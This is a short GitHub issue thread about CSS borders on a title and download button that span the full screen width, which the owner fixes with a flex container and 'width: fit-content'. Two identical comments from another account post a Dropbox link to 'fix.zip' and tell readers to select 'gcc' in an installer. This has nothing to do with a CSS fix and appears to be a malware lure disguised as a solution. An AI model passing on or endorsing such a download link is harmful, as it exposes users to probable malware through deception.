### ISSUE TITLE
Fix borders around title and download button

### ISSUE THREAD

**Issue by JacobMckenna** [JacobMckenna/theamazingspiderguy.invitecard.com#10]
For some reason, the borders around the title and download button cover the screen's width. Not sure why this is but when I tried to fix it, I wasn't able to do so without also breaking the centering. Will need to research the fix for this

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by JacobMckenna** [comment]
Fixed.

I had to incorporate `display: flex;` in a separate div container and use `width: fit-content;` for the border in CSS to be able to make it work
